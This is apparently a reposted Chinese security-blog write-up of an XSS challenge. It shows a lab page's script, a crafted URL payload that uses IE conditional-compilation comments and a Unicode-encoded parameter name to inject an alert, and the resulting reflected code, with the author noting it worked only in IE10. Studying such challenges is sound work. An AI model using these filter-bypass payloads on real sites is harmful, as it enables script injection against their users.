记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

SecProject Web AppSec 之XSS解析 第三篇

2013-09-13 15:00
正常页面:
 
http://sdl.me/challenge1/xss3/JsChallenge3.asp?input1=Something
 
 

<html>
<head>

<SCRIPT language="Javascript">
function setid(id, name)
{
if (document.getElementById('Something').value > 10) {
document.getElementById('Something').value = id;
}else if (document.getElementById('Something').value > 0) {
document.getElementById('test2').name = name;
}
self.close();
}
//-->
</script>
</head>
<body>

……

 

 
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert%28%22@kinugawamasato%20and%20@irsdl%22%29;{{//%20@end%20@*//*%27%29%29;};{1&in%u2119ut1=1}/*@cc_on%20@if%281%291;@else
 
http://sdl.me/challenge1/xss3/JsChallenge3.asp?Input1=*/alert(“@kinugawamasato and @irsdl”);{{// @end @*//*’));};{1&inℙut1=1}/*@cc_on @if(1)1;@else
 
 

<SCRIPT language="Javascript">
function setid(id, name)
{
if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 10) {
document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value = id;
}else if (document.getElementById('*/alert("@kinugawamasato and @irsdl");{{// @end @*//*'));};{1, 1}/*@cc_on @if(1)1;@else').value > 0) {
document.getElementById('test2').name = name;
}
self.close();
}
//-->
</script>

 

 
在IE10上确实成功了,但还没弄明白什么情况……其最后根本也没闭合注释符 */
 
其它浏览器,Firefox,Chrome均不成功。
 
其中在URL中用到了%u2119 编码……
 
待解释。
知识来源: www.2cto.com/Article/201309/243463.html

阅读:68019 | 评论:0 | 标签:xss

想收藏或者和大家分享这篇好文章→复制链接地址

“SecProject Web AppSec 之XSS解析 第三篇”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于垒土;黑客之术,始于阅读

推广

工具

标签云